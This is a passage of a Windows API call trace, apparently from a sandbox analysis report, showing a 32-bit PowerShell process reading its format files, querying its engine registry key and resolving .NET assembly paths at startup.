[6]=0x1c, [7]=0xea))) returned 0x0 [0144.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de1cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0144.655] GetLastError () returned 0x0 [0144.655] SetErrorMode (uMode=0x1) returned 0x1 [0144.655] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c [0144.655] GetLastError () returned 0x0 [0144.656] GetFileType (hFile=0x31c) returned 0x1 [0144.656] SetErrorMode (uMode=0x1) returned 0x1 [0144.656] GetFileType (hFile=0x31c) returned 0x1 [0144.656] ReadFile (in: hFile=0x31c, lpBuffer=0x3042b78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042b78*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0144.752] GetLastError () returned 0x0 [0144.753] ReadFile (in: hFile=0x31c, lpBuffer=0x3042b78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042b78*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0144.753] GetLastError () returned 0x0 [0144.755] ReadFile (in: hFile=0x31c, lpBuffer=0x3042b78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042b78*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0144.755] GetLastError () returned 0x0 [0144.755] ReadFile (in: hFile=0x31c, lpBuffer=0x3042b78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042b78*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0144.755] GetLastError () returned 0x0 [0144.756] ReadFile (in: hFile=0x31c, lpBuffer=0x3042b78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042b78*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0144.756] GetLastError () returned 0x0 [0144.756] ReadFile (in: hFile=0x31c, lpBuffer=0x3042b78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042b78*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0144.756] GetLastError () returned 0x0 [0144.757] ReadFile (in: hFile=0x31c, lpBuffer=0x3042b78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042b78*, lpNumberOfBytesRead=0x2de734*=0xaca, lpOverlapped=0x0) returned 1 [0144.757] GetLastError () returned 0x0 [0144.757] ReadFile (in: hFile=0x31c, lpBuffer=0x30421e2, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x30421e2*, lpNumberOfBytesRead=0x2de734*=0x0, lpOverlapped=0x0) returned 1 [0144.757] GetLastError () returned 0x0 [0144.757] ReadFile (in: hFile=0x31c, lpBuffer=0x3042b78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x3042b78*, lpNumberOfBytesRead=0x2de734*=0x0, lpOverlapped=0x0) returned 1 [0144.757] GetLastError () returned 0x0 [0144.757] CloseHandle (hObject=0x31c) returned 1 [0144.757] GetLastError () returned 0x0 [0144.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de294, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0144.757] GetLastError () returned 0x0 [0144.758] SetErrorMode (uMode=0x1) returned 0x1 [0144.758] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x3063b74 | out: lpFileInformation=0x3063b74*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0144.758] GetLastError () returned 0x0 [0144.758] SetErrorMode (uMode=0x1) returned 0x1 [0144.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0144.758] GetLastError () returned 0x0 [0144.758] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de6b8 | out: phkResult=0x2de6b8*=0x31c) returned 0x0 [0144.759] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2de700, lpData=0x0, lpcbData=0x2de6fc*=0x0 | out: lpType=0x2de700*=0x1, lpData=0x0, lpcbData=0x2de6fc*=0x56) returned 0x0 [0144.759] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2de700, lpData=0x3da558, lpcbData=0x2de6fc*=0x56 | out: lpType=0x2de700*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2de6fc*=0x56) returned 0x0 [0144.759] RegCloseKey (hKey=0x31c) returned 0x0 [0144.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0144.759] GetLastError () returned 0x0 [0144.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de1f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0144.759] GetLastError () returned 0x0 [0144.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x2ddf24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0144.841] GetLastError () returned 0x0 [0144.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ddf24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0144.843] GetLastError () returned 0x57 [0144.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x2ddf24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0144.851] GetLastError () returned 0x57 [0144.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0144.870] GetLastError () returned 0x57 [0144.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x2ddf24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0144.880] GetLastError () returned 0x57 [0144.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x2ddf24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52 [0144.888] GetLastError () returned 0x57 [0144.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x2ddf24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74 [0144.914] GetLastError () returned 0x57 [0144.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x2ddf24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0144.916] GetLastError () returned 0x57 [0144.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x2ddf24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60 [0144.924] GetLastError () returned 0x57 [0144.956] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x2ddf24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0144.956] GetLastError () returned 0x57 [0144.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x2ddf24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0144.964] GetLastError () returned 0x57 [0144.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x2ddf24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0144.972] GetLastError () returned 0x57 [0144.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x2ddf24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50 [0144.981] GetLastError () returned 0x57 [0144.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x2ddf24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e [0144.987] GetLastError () returned 0x57 [0145.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x2ddf24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c [0145.035] GetLastError () returned 0x57 [0145.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x2ddf24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0145.037] GetLastError () returned 0x57 [0145.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2ddf24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0145.038] GetLastError () returned 0x57 [0145.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x2ddf24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0145.038] GetLastError () returned 0x57 [0145.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.038] GetLastError () returned 0x57 [0145.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.038] GetLastError () returned 0x57 [0145.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.038] GetLastError () returned 0x57 [0145.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.039] GetLastError () returned 0x57 [0145.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0145.039] GetLastError () returned 0x57 [0145.145] VirtualQuery (in: lpAddress=0x2dd410, lpBuffer=0x2de410, dwLength=0x1c | out: lpBuffer=0x2de410*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.149] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x3eb6d843, Data2=0xf3df, Data3=0x4b3c, Data4=([0]=0xa2, [1]=0x70, [2]=0xf1, [3]=0x89, [4]=0xa5, [5]=0x96, [6]=0x2a, [7]=0x38))) returned 0x0 [0145.150] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x7eeebf00, Data2=0x1cf, Data3=0x4df7, Data4=([0]=0x98, [1]=0xa7, [2]=0xfe, [3]=0x16, [4]=0x9f, [5]=0x8a, [6]=0x95, [7]=0xd))) returned 0x0 [0145.150] VirtualQuery (in: lpAddress=0x2dd488, lpBuffer=0x2de488, dwLength=0x1c | out: lpBuffer=0x2de488*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.150] VirtualQuery (in: lpAddress=0x2dd488, lpBuffer=0x2de488, dwLength=0x1c | out: lpBuffer=0x2de488*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.150] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xbfec0f29, Data2=0x34ed, Data3=0x4f87, Data4=([0]=0x8e, [1]=0x39, [2]=0x7e, [3]=0x69, [4]=0x78, [5]=0xd4, [6]=0xf4, [7]=0x29))) returned 0x0 [0145.154] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xdc88a8b5, Data2=0x5c28, Data3=0x4412, Data4=([0]=0x96, [1]=0x5c, [2]=0x56, [3]=0xc2, [4]=0x73, [5]=0x24, [6]=0x4c, [7]=0x5))) returned 0x0 [0145.154] VirtualQuery (in: lpAddress=0x2dd5b4, lpBuffer=0x2de5b4, dwLength=0x1c | out: lpBuffer=0x2de5b4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.154] VirtualQuery (in: lpAddress=0x2dd460, lpBuffer=0x2de460, dwLength=0x1c | out: lpBuffer=0x2de460*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.154] VirtualQuery (in: lpAddress=0x2dd460, lpBuffer=0x2de460, dwLength=0x1c | out: lpBuffer=0x2de460*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.154] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0x890e8a2c, Data2=0x914a, Data3=0x4b04, Data4=([0]=0xb2, [1]=0xe1, [2]=0xdb, [3]=0xbe, [4]=0xeb, [5]=0xbc, [6]=0x60, [7]=0xc5))) returned 0x0 [0145.154] VirtualQuery (in: lpAddress=0x2dd5b4, lpBuffer=0x2de5b4, dwLength=0x1c | out: lpBuffer=0x2de5b4*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.154] VirtualQuery (in: lpAddress=0x2dd4cc, lpBuffer=0x2de4cc, dwLength=0x1c | out: lpBuffer=0x2de4cc*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.155] VirtualQuery (in: lpAddress=0x2dd180, lpBuffer=0x2de180, dwLength=0x1c | out: lpBuffer=0x2de180*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.168] VirtualQuery (in: lpAddress=0x2dd180, lpBuffer=0x2de180, dwLength=0x1c | out: lpBuffer=0x2de180*(BaseAddress=0x2dd000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0145.168] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xa283d12f, Data2=0x58a3, Data3=0x41ea, Data4=([0]=0xa8, [1]=0x3c, [2]=0xec, [3]=0xf3, [4]=0xb7, [5]=0x43, [6]=0x81, [7]=0x8f))) returned 0x0 [0145.168] CoCreateGuid (in: pguid=0x2de728 | out: pguid=0x2de728*(Data1=0xb3a48702, Data2=0xc46a, Data3=0x43c7, Data4=([0]=0x9c, [1]=0x9b, [2]=0x93, [3]=0x66, [4]=0xb9, [5]=0xfa, [6]=0x7a, [7]=0xe2))) returned 0x0 [0145.168] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2de1cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0145.168] GetLastError () returned 0x57 [0145.168] SetErrorMode (uMode=0x1) returned 0x1 [0145.168] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x34c [0145.168] GetLastError () returned 0x0 [0145.168] GetFileType (hFile=0x34c) returned 0x1 [0145.168] SetErrorMode (uMode=0x1) returned 0x1 [0145.168] GetFileType (hFile=0x34c) returned 0x1 [0145.169] ReadFile (in: hFile=0x34c, lpBuffer=0x2f3afa4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2f3afa4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.169] GetLastError () returned 0x0 [0145.169] ReadFile (in: hFile=0x34c, lpBuffer=0x2f3afa4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2f3afa4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.169] GetLastError () returned 0x0 [0145.169] ReadFile (in: hFile=0x34c, lpBuffer=0x2f3afa4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2f3afa4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.169] GetLastError () returned 0x0 [0145.169] ReadFile (in: hFile=0x34c, lpBuffer=0x2f3afa4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2f3afa4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.169] GetLastError () returned 0x0 [0145.169] ReadFile (in: hFile=0x34c, lpBuffer=0x2f3afa4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2f3afa4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.169] GetLastError () returned 0x0 [0145.169] ReadFile (in: hFile=0x34c, lpBuffer=0x2f3afa4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2f3afa4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.169] GetLastError () returned 0x0 [0145.169] ReadFile (in: hFile=0x34c, lpBuffer=0x2f3afa4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2f3afa4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.169] GetLastError () returned 0x0 [0145.169] ReadFile (in: hFile=0x34c, lpBuffer=0x2f3afa4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2f3afa4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.169] GetLastError () returned 0x0 [0145.170] ReadFile (in: hFile=0x34c, lpBuffer=0x2f3afa4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2f3afa4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.170] GetLastError () returned 0x0 [0145.171] ReadFile (in: hFile=0x34c, lpBuffer=0x2f3afa4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2f3afa4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.171] GetLastError () returned 0x0 [0145.171] ReadFile (in: hFile=0x34c, lpBuffer=0x2f3afa4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2f3afa4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.171] GetLastError () returned 0x0 [0145.171] ReadFile (in: hFile=0x34c, lpBuffer=0x2f3afa4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2f3afa4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.171] GetLastError () returned 0x0 [0145.171] ReadFile (in: hFile=0x34c, lpBuffer=0x2f3afa4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2f3afa4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.171] GetLastError () returned 0x0 [0145.171] ReadFile (in: hFile=0x34c, lpBuffer=0x2f3afa4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2de734, lpOverlapped=0x0 | out: lpBuffer=0x2f3afa4*, lpNumberOfBytesRead=0x2de734*=0x1000, lpOverlapped=0x0) returned 1 [0145.171] GetLastError () returned 0x0 [0145.171] ReadFile (in: hFile=0x34c, lpBuffer=0x2f3afa4, nNumberOfBytesToRead=0x1000, 